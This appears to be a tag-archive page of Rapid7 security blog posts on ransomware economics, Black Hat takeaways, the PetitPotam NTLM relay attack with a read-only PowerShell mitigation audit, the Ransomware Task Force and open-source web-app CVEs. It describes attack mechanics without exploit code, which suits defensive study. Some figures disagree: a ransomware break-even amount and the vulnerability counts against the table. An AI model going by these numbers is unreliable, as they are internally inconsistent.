Tag Archives: Vulnerability management

Slot Machines and Cybercrime: Why Ransomware Won’t Quit Pulling Our Lever

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/08/06/slot-machines-and-cybercrime-why-ransomware-wont-quit-pulling-our-lever/


The casino floor at Bally’s is a thrilling place, one that loads of hackers are familiar with from our time at DEF CON. One feature of these casinos is the unmistakable song of slots being played. Imagine a slot machine that costs a dollar to play and pays out $75 if you win. What probability of winning would it take to get you to play?

Naively, I’d guess most people’s answers are around “1 in 75”, or maybe “1 in 74” if they want to turn a profit. One in 74 is a payout probability of about 1.37%. At 1.37%, you turn a profit, on average, of $1 per 74 games, so how many times do you play? Probably not that many. You’re basically playing for free, but you’re not making much off $1 of profit per 74 pulls, at least on average.

But what if that slot machine paid out about half the time, giving you $75 every other time you played? How many times would you play?

This is the game that ransomware operators are playing.

Playing Against the Profiteers

Between Wannacry, the Colonial Pipeline hack, and the recent Kaseya incident, everyone is now familiar with supply chain attacks — particularly those that use ransomware. As a result, ransomware has entered the public consciousness, and a natural question is: why ransomware? From an attacker’s perspective, the answer is simple: why not?

For the uninitiated, ransomware is a family of malware that encrypts files on a system and demands a payment to decrypt the files. Proof-of-concept ransomware has existed since at least 1996, but the attack vector really hit its stride with CryptoLocker’s innovative use of Bitcoin as a payment method. This allowed ransomware operators to perpetrate increasingly sophisticated attacks, including the 2017 WannaCry attack — the effects of which, according to the ransomware payment tracker Ransomwhere, are still being felt today.

Between the watering hole attacks and exploit kits of the Angler EK era and the recent spate of ransomware attacks targeting high-profile companies, the devastation of ransomware is being felt even by those outside of infosec. The topic of whether or not to pay ransoms — and whether or not to ban them — has sparked heated debate and commentary from folks like Tarah Wheeler and Ciaran Martin at the Brookings Institute, the FBI, and others in both industrial and academic circles. One noteworthy academic paper by Cartwright, Castro, and Cartwright uses game theory to ask the question of whether or not to pay.

Ransomware operators aren’t typically strategic actors with a long-term plan; rather, they’re profiteers who seek targets of opportunity. No target is too big or too small for these groups. Although these analyses differ in the details, they get the message right — if the ransomware operators don’t get paid, they won’t want to play the game anymore.

Warning: Math Ahead

According to Kaspersky, 56% of ransomware victims pay the ransom. Most other analyses put it around 50%, so we’ll use Kaspersky’s. In truth, it’s unlikely we have an accurate number for this, as many organizations specifically choose to pay the ransom in order to avoid public exposure of the incident.

If a ransomware attack costs some amount of money to launch and is successful some percentage of the time, the amount of money made from each attack is:

[equation image]

We call this the expected value of an attack.

It’s hard to know how many attacks are launched — and how many of those launched attacks actually land. Attackers use phishing, RDP exploits, and all kinds of other methods to gain initial access. For the moment, let’s ignore that problem and assume that every attack that gets launched lands. Ransomware that lands on a machine is successful about 54% of the time, and the probability of payment is 56%. Together, this means that the expected value of an attack is:

[equation image]

Given the average ransom payment is up to $312,493 as of 2020 — or using Sophos’s more conservative estimate, $170,404 — that means ransomware authors are turning a profit as long as the cost of an attack is less than $127,747.14 (or the more conservative $51,530.17). Based on some of the research that’s been done on the cost of attacks, where high-end estimates put it at around $4,200, we can start to see how a payout of almost 75 times the cost to play becomes an incentive.

In fact, because expected values are linear and the expected value is only for one play, we can see pretty quickly that in general, two attacks will give us double the value of one, and three will triple it. This means that if we let our payout be a random variable X, a ransomware operator’s expected value over an infinite number of attacks is… infinite.

[equation image]
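The equation images did not survive in this archive, so here is the expected-value reasoning written out. This is an added derivation, not the post’s own formulas; the symbol names are mine, and the figures are the post’s (54% success once landed, 56% payment rate, Sophos’s $170,404 average ransom).

$$\mathbb{E}[X] = p_s\,p_p\,R - C$$

where $p_s$ is the probability that a landed attack succeeds, $p_p$ the probability that the victim pays, $R$ the ransom, and $C$ the cost to launch the attack. With $p_s = 0.54$ and $p_p = 0.56$:

$$\mathbb{E}[X] = 0.3024\,R - C, \qquad \text{so } \mathbb{E}[X] > 0 \iff C < 0.3024\,R.$$

For $R = \$170{,}404$ the break-even cost is $0.3024 \times 170{,}404 \approx \$51{,}530.17$, the conservative figure quoted above. Linearity of expectation over $n$ attacks $X_1, \dots, X_n$ with the same distribution gives

$$\mathbb{E}\Big[\sum_{i=1}^{n} X_i\Big] = \sum_{i=1}^{n} \mathbb{E}[X_i] = n\,\mathbb{E}[X] \xrightarrow{\;n \to \infty\;} \infty \quad \text{whenever } \mathbb{E}[X] > 0,$$

which is the “infinite” payoff referred to above. The same arithmetic drives the slot-machine analogy: at $p = 1/74$ each \$1 pull returns $75/74 - 1 \approx \$0.0135$ on average, while at $p = 1/2$ it returns $37.5 - 1 = \$36.50$.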

Obviously, an infinite number of ransomware attacks is not reasonable, and there is a limit to the amount that any individual or business can pay over time before they just give up. But from an ideal market standpoint, the message is clear: While ransoms are being paid at these rates and sizes, the problem is only going to grow. Just like you’d happily play a slot machine that paid out almost half the time, attackers are happy to play a game that gets them paid more than 40% of the time, especially because the profits are so large.

Removing Incentives

So why would ransomware operators ever stop if, in an idealized model, there’s potentially infinite incentive to keep playing? A few reasons:

  1. The value of payments is lower
  2. The cost becomes prohibitive
  3. The attacks don’t work
  4. Nobody is paying

Out of the gate, we can more or less dismiss the notion that payment values will get lower. The only way to lower the value of the payment is to lower the value of Bitcoin to nearly zero. We’ve seen attempts to ban and regulate cryptocurrencies, but none of those have been successful.

In terms of the monetary cost, this is also pretty much a dead end for us. Even if we could remove all of the efficiencies and resilience of darknet markets, that would only remove the lowest-skill attackers from the equation. Other groups would still be capable of developing their own exploits and ransomware.

Ultimately, what our first two options have in common is that they deal, in a pretty direct way, with adversary capabilities. They leave room for adversaries to adapt and respond, ultimately trying to affect things that are in the control of attackers. This makes them much less desirable avenues for response.

So let’s look at the things that victims have control over: defenses and payments.

Defending Against Ransomware

Defending against ransomware is quite similar to defending against other attack types. In general, ransomware is not the first-stage payload delivered by an exploit; instead, it’s dropped by a loader. So the name of the game is to prevent code execution on endpoints. As security professionals, this is something we know quite well.

For ransomware, the majority of attacks come via a handful of vectors, which will be familiar to most security practitioners:

  • Phishing
  • Vulnerable services
  • Weak passwords, especially on Remote Desktop Protocol
  • Exploit kits

Many of these initial access vectors can be kept in check with user training, vulnerability scans, and sound patching practices. Once initial access is established, many ransomware operators use tools like WMI, PsExec, PowerShell, and Cobalt Strike, in addition to commodity malware like TrickBot, to move laterally before hitting the entire network with ransomware.

Looking for these indicators of compromise is one way to limit the potential impact of ransomware. But of course, these techniques are hard to detect, and no organization is able to catch 100% of the bad things that are coming at them. So what do victims do when the worst happens?

Choosing Not to Pay

When ransomware attacks are successful, victims have two primary choices: pay or don’t. There are many follow-on decisions from each of these decisions, but the first and most critical decision (for the attacker) is whether or not to pay the ransom.

When people pay the ransom, they’re likely — though not guaranteed — to get their files back. However, because of the significant number of first-stage implants and the lateral movement associated with ransomware attacks, there’s still a lot of incident response work to be done beyond the return of the files. For many organizations, if they don’t have a suitable off-site backup in place, this may feel like an inevitable impact of this type of attack. As Tarah Wheeler pointed out, this is often something that can simply be written off as a business expense. Consequently, hackers get paid, companies get to write off the loss, and nobody learns a lesson.

As we discussed above, when you pay a ransom, you’re paying for the next attack, and according to reports from the UK’s NCSC, you may also be paying for human trafficking. None of us wants to be funding these attackers, but we want to protect our data. So how do we get away from paying?

As we mentioned before, preventing the attacks in the first place is the optimal outcome for us as defenders, but security solutions are never 100% effective. The easiest way not to pay is to have an off-site backup. That will let you invoke your normal incident response process while keeping your data intact. In many cases, this isn’t any more expensive than paying, and you’re guaranteed to get your data back.

In some cases, a decrypter is available for the ransomware, which lets victims restore their files without paying the ransom. Organizations like No More Ransom make decrypters available for free, saving victims significant sums that would otherwise go toward paying for decryption keys.

Having a network configuration that makes lateral movement difficult will also reduce the “blast radius” of the attack and can help mitigate the spread. In these cases, you may be able to get away with reimaging a handful of employee laptops and accepting the loss. Ultimately, letting people write off their backups instead of their ransom payments encourages a switch to sensible backup policies and discourages these ransomware operators.

Why the Wheel Keeps Spinning

Ransomware remains a significant problem, and I hope we’ve demonstrated why: the incentives for everyone, including victims, are there to increase the number of ransomware attacks. Attackers who do more attacks will see more profits, which fund subsequent attacks. While victims can write off their payments, there’s no incentive to take steps to mitigate the impact of ransomware, so the problem will continue.

Crucially, ransomware attackers aren’t picky about their victims. They’re not nation-state actors who seek to target only the largest companies with the most intellectual property. Rather, they’re attackers of opportunity — their victim is anyone who lets their lever be pulled, and as long as the victims keep paying out often enough, attackers are happy to play.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Post Syndicated from Dwayne A. Johnson original https://blog.rapid7.com/2021/08/05/black-hat-recap-1/


OK, no big deal, we know how this goes. Once again, many of us are attending Black Hat in a virtual capacity as COVID-19 meanders its way out of our lives. The good news is that there’s an actual live component again this year in Las Vegas, and that’s progress. Here’s hoping that next year the pandemic will be more firmly in the rearview and any remaining travel trepidation will be a “2021 thing.”

So flip the on-switch to some neon lights if you got ‘em, and let’s get into what our Rapid7 experts thought were the biggest takeaways from a busy Day 1 of new tools, techniques, and up-to-the-minute information.


Detection and Response


Key takeaways

  • Does it make sense for an organization to “roll its own SIEM”? Yes and no (because of course that’s the answer). For very specific use cases outside of the norm, it might make sense to start the often-herculean, cost-prohibitive task of building that cloud-native SIEM to best serve hyper-specific needs. But is it worth it to miss out on the high-quality, actionable intel a commercial vendor brings to the table?
  • When it comes to distributed malware, attackers are bypassing traditional detection. Return Oriented Programming (ROP — pronounced “rope”) gives attackers a bypass route through initial access points to get onto an endpoint more quickly and easily. However, the real endgame is to bypass that endpoint agent and attack the network at large.
  • Just how easy is it to hack a hotel? If you were the victim of a hotel hack, you might think a ghost had taken up residence in your room as your IoT-connected bed suddenly moves up and down. However, the proliferation of unprotected networks and IoT devices in modern hotels has created unprecedented opportunities for attackers to gain nefarious access. A back-to-basics approach might be the best way forward for the hospitality industry.

Vulnerability Risk Management


Key takeaways

  • Open Platform Communications (OPC) standards are a wondrous thing, allowing products across many industries to interact and exchange data efficiently. But is security a priority? When commercial vendors all along a supply chain start making their own customizations to the common legacy protocol, well, security isn’t so secure anymore.
  • Find an Active Directory certificate vulnerability? Good luck getting it patched. These configuration-related instances are flaws that larger organizations might be hesitant to acknowledge. Check out this (extremely long, but informative) whitepaper on the subject — and the accompanying blog — from SpecterOps.
  • Printer vulnerabilities aren’t paper-thin. The Windows Print Spooler can offer up an attack surface that leads to an instance like the PrintDemon incident. Some of the larger vulnerabilities see attackers and exploit authors leveraging printer path names.

Research and Policy


Key takeaways

  • Let’s talk lasers — specifically, how attackers can use them to exploit vulnerabilities in hardware like bitcoin wallets. One would hope that the key material they’re storing in that wallet is secure. However, with a laser you can “look through” a silicon chip to confuse the CPU and bypass security checks.  
  • Wondering how future information wars will be fought? By bots. Advanced bots, that is — those that leverage Generative Pre-Trained Transformer (GPT) language models like GPT-3. With this powerful tool, a small group of people could generate misinformation at scale, quickly spinning up thousands of fake social accounts creating individual posts that sound like actual human language. That’s scary.  
  • As far as we know, AI cannot yet be arrested. However, threat actors can still run afoul of digital crime laws like the Computer Fraud and Abuse Act (CFAA) when they employ adversarial machine learning. This “poisoned data” results in systems learning things they shouldn’t. Current federal and state computer-crime laws need to reflect these more sophisticated AI attack methods so that, you know, the machines don’t win.  

We’ll see you right back here tomorrow for Black Hat Day 2 insights and takeaways from the Rapid7 team!


PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/


Late last month (July 2021), security researcher Topotam published a proof-of-concept (PoC) implementation of a novel NTLM relay attack christened “PetitPotam.” The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running — including domain controllers.

PetitPotam works by abusing Microsoft’s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing an attacker who is able to leverage the technique to do… pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up here.

According to Microsoft’s ADV210003 advisory, Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:

  • Certificate Authority Web Enrollment
  • Certificate Enrollment Web Service

NTLM relay attacks aren’t new — they’ve been around for decades. However, a few things make PetitPotam and its variants of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don’t need credentials to make this thing work, but more importantly, there’s no user interaction required to coerce a target domain controller to authenticate to a threat actor’s server. Not only is this easier to do — it’s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model.

Microsoft released an advisory with a series of updates in response to community concern about the attack — which, as they point out, is “a classic NTLM relay attack” that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft’s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in KB5005413. Since it looks like Microsoft will not issue an official fix for this vector, community researchers have added PetitPotam to a running list of “won’t fix” exploitable conditions in Microsoft products.

The PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to Active Directory Certificate Services attack surface area.

Mitigation Guidance

In general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as Extended Protection for Authentication (EPA) coupled with “Require SSL” for affected virtual sites, or signing features such as SMB signing. Implementing “Require SSL” is a critical step: Without it, EPA is ineffective.

As an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft’s KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers.

In this order, KB5005413 recommends:

  • Disabling NTLM Authentication on Windows domain controllers. Documentation on doing this can be found here.
  • Disabling NTLM on any AD CS Servers in your domain using the group policy Network security: Restrict NTLM: Incoming NTLM traffic. For step-by-step directions, see KB5005413.
  • Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the “Certificate Authority Web Enrollment” or “Certificate Enrollment Web Service” services.

While not included in Microsoft’s official guidance, community researchers have tested using NETSH RPC filtering to block PetitPotam attacks with apparent success. Rapid7 research teams have not verified this behavior, but it may be an option for blocking the attack vector without negatively impacting local EFS functionality.
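As an added example (not Microsoft’s or Rapid7’s code), the following read-only PowerShell audit checks an AD CS host against the configuration points above: whether incoming NTLM is restricted, whether the enrollment web applications require Extended Protection together with Require SSL, and whether the Windows Authentication providers still permit NTLM. The site name, the /CertSrv path and the *_CES_* application-name pattern are assumptions to adjust to your deployment.

```powershell
# Added audit example (not from KB5005413 or Rapid7): reports whether an AD CS / IIS host
# has the NTLM-relay mitigations described above. Read-only; changes nothing.
# Assumptions: the WebAdministration module is available, the CA Web Enrollment app is
# at /CertSrv under $SiteName, and CES apps follow the <CAName>_CES_* naming pattern.
Import-Module WebAdministration

$SiteName = 'Default Web Site'
$findings = New-Object System.Collections.Generic.List[string]

# 1. "Network security: Restrict NTLM: Incoming NTLM traffic" is persisted in this value:
#    2 = Deny all accounts, 1 = Deny all domain accounts, 0 or absent = Allow all.
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0' -ErrorAction SilentlyContinue
$incoming = if ($null -ne $lsa.RestrictReceivingNTLMTraffic) { [int]$lsa.RestrictReceivingNTLMTraffic } else { 0 }
if ($incoming -lt 2) {
    $findings.Add("Incoming NTLM is not fully denied (RestrictReceivingNTLMTraffic=$incoming); relayed authentication to this host remains possible.")
}

# 2. Per-application IIS checks for the two enrollment services the advisory names.
$apps = Get-WebApplication -Site $SiteName |
        Where-Object { $_.path -eq '/CertSrv' -or $_.path -like '*_CES_*' }
if (-not $apps) {
    $findings.Add("No /CertSrv or *_CES_* application found under '$SiteName'; check the site name or app naming.")
}

foreach ($app in $apps) {
    $ps      = "IIS:\Sites\$SiteName$($app.path)"
    $winAuth = Get-WebConfiguration -PSPath $ps -Filter 'system.webServer/security/authentication/windowsAuthentication'
    $access  = Get-WebConfiguration -PSPath $ps -Filter 'system.webServer/security/access'

    # Extended Protection (channel binding) must be "Require"; "Allow" or "None" still
    # accepts a relayed NTLM exchange. Attribute values are compared by their IIS names.
    $epa = [string]$winAuth.extendedProtection.tokenChecking
    if ($epa -ne 'Require') {
        $findings.Add("$($app.path): Extended Protection is '$epa', expected 'Require'.")
    }

    # EPA binds the authentication to the TLS channel, so without Require SSL it has no effect.
    $ssl = [string]$access.sslFlags
    if ($ssl -notmatch 'Ssl') {
        $findings.Add("$($app.path): Require SSL is off (sslFlags='$ssl'); EPA is ineffective without it.")
    }

    # Disabling NTLM for IIS means removing the NTLM provider (and bare Negotiate, which can
    # fall back to NTLM), leaving Negotiate:Kerberos as the only Windows Authentication provider.
    $providers = @(Get-WebConfiguration -PSPath $ps `
                   -Filter 'system.webServer/security/authentication/windowsAuthentication/providers/add' |
                   ForEach-Object { [string]$_.value })
    $weak = $providers | Where-Object { $_ -eq 'NTLM' -or $_ -eq 'Negotiate' }
    if ($weak) {
        $findings.Add("$($app.path): providers [$($providers -join ', ')] still permit NTLM; use Negotiate:Kerberos only.")
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'PASS: the KB5005413 NTLM relay mitigations appear to be in place on this host.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

Run it in an elevated session on each AD CS server after applying the changes; a clean pass is expected only once all three mitigations (NTLM restriction, EPA with Require SSL, Kerberos-only providers) are in place.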

Rapid7 Customers

We are investigating approaches for adding assessment capabilities to InsightVM and Nexpose to determine exposure to PetitPotam relay attacks.


The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/


In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also continuing to see trends around ransomware-as-a-service and double or triple extortion continuing to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help to build greater understanding of what is happening in the attack landscape and may enable law enforcement to build more information on attackers, or even recapture payments.
  • Requiring organizations to conduct cost-benefit analysis prior to making payments (Action 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outsizes that of the ransom, leaving them no choice but to give into their attacker’s demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, believe it’s relevant to them, or understand how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.


Multiple Open Source Web App Vulnerabilities Fixed

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/07/27/multiple-open-source-web-app-vulnerabilities-fixed/


Today, Rapid7 is disclosing 9 vulnerabilities that affect 3 open-source projects: EspoCRM, Pimcore, and Akaunting. Right out of the gate, I’d like to give a special thanks to these 3 open-source project maintainers. While it’s never great to learn of new vulnerabilities in your own product, all 3 project maintainers accepted, validated, and provided fixes for these vulnerabilities within one day, which is amazing when it comes to vulnerability disclosure. EspoCRM was notified on May 4, 2021 and patched source on May 5; Akaunting, on May 13 and turned it around on May 14; and Pimcore validated their vulnerabilities on April 29 after learning about them on April 28, 2021. Nice work, all around.

Now, I’m not sure why open source is just so much faster than the typical proprietary software vuln-patching pipeline, at least for the disclosures I’ve been involved in. It might be because, in open source, you’re almost guaranteed to have your first communication with a hands-on-keyboard software engineer who is personally and emotionally invested in the software; whereas in proprietary land, first contact might be a lightly monitored support alias, staffed by a third-party provider. Rapid7’s vulnerability disclosure process assumes a minimum of 60 days for remediation of any vulnerability we report to a vendor, and I’d say about half the time, we’re looking at more like 90 to 120 days from report to disclosure — and, sometimes, we are left with the unhappy option of publishing without a fix in hand at all.

Of course, proprietary software occasionally offers fast turnaround times on validation and fixes to source, as well (SonicWall comes to mind), and proprietary vendors often have very good reason to take their time with acknowledging, fixing, testing, and releasing fixes; but the fact remains that what’s normal in open source communities — hyperfast turnaround on fixing reported vulnerabilities — is a rarity in proprietary software.

By the way, these aren’t one- or two-person passion projects. All 3 of these projects have real users, real customers of their attendant support services and cloud-hosted versions, and are undoubtedly the core applications supporting thousands of small to medium businesses running today. This popularity is the reason why Trevor and Wiktor took a look at them in the first place; they suspected these small-to-medium business applications haven’t seen a ton of attention from the eye of a penetration tester, and this blog post is a result of testing that hypothesis.

With that, I’ll stop picking on proprietary software vendors in general and switch gears to take a look at the specific vulnerabilities in these specific projects.

Common Vulnerability Classes

From this completely unscientific and statistically insignificant sampling of vulnerabilities, we can draw the deeply unsurprising conclusion that enterprise web applications tend to suffer from common web-application vulnerabilities. 3 are examples of persistent cross-site scripting (XSS), where a malicious user can plant a bit of browser-executable code in the application, which is designed to lie in wait and trigger when someone else comes along and loads that code, and 2 are SQL injection (SQLi) vulnerabilities, where the attacker uses the web application as a convoluted portal to issue direct commands to the backing database, usually to steal data or create powerful web-app users.

SQL injection used to be a nice way to get a command injection path to the underlying operating system, but that’s something of a rarity these days. But, 1 issue disclosed here is a command injection issue, which we rate as the highest critical vulnerability of the bunch, since it can allow the attacker to commandeer the operating system and do things like use it as a beachhead into the rest of the network, install a cryptominer or ransomware, or perform other nefarious lower-level actions.

The remaining vulnerabilities are: a denial-of-service vulnerability, where the attacker can crash the whole application with a naughty HTTP request; an authentication bypass, where the attacker can move from one logical group to another without authorization; and a weak password-reset vulnerability, where the attacker can abuse the “I forgot my password” function to source a phishing email from the application to a registered user.

The table below provides the salient information about the 9 vulnerabilities being disclosed today. Note that every vulnerability listed here was promptly fixed by the vendor in the typical open-source manner. In short: if you use any of these applications in your business and keep up on your updates, you already have the fixes. The rest of this post details the individual findings by Wiktor Sędkowski of Nokia and Trevor Christiansen of Rapid7, who worked together on this project and disclosed these issues through Rapid7’s vulnerability disclosure process.

We’re publishing these details today so other, similar web applications can be made aware of these vulnerability classes and take a look at their own codebases to make sure they’re not making the same mistakes. Thanks, Wiktor and Trevor!

CVE Affected Project CWE Base CVSS Status
CVE-2021-3539 EspoCRM v6.1.6 CWE-79 (Persistent XSS) 6.3 (Medium) Fixed in version 6.1.7
CVE-2021-31867 Pimcore Customer Data Framework v3.0.0 CWE-89 (SQL Injection) 6.5 (Medium) Fixed in v3.0.2
CVE-2021-31869 Pimcore AdminBundle v6.8.0 CWE-89 (SQL Injection) 6.5 (Medium) Fixed in v6.9.4
CVE-2021-36800 Akaunting v2.1.12 CWE-94 (Code injection) 8.7 (High) Fixed in Akaunting v2.1.13
CVE-2021-36801 Akaunting v2.1.12 CWE-639 (Auth bypass) 8.5 (High) Fixed in Akaunting v2.1.13
CVE-2021-36802 Akaunting v2.1.12 CWE-248 (Uncaught Exception DoS) 6.5 (Medium) Fixed in Akaunting v2.1.13
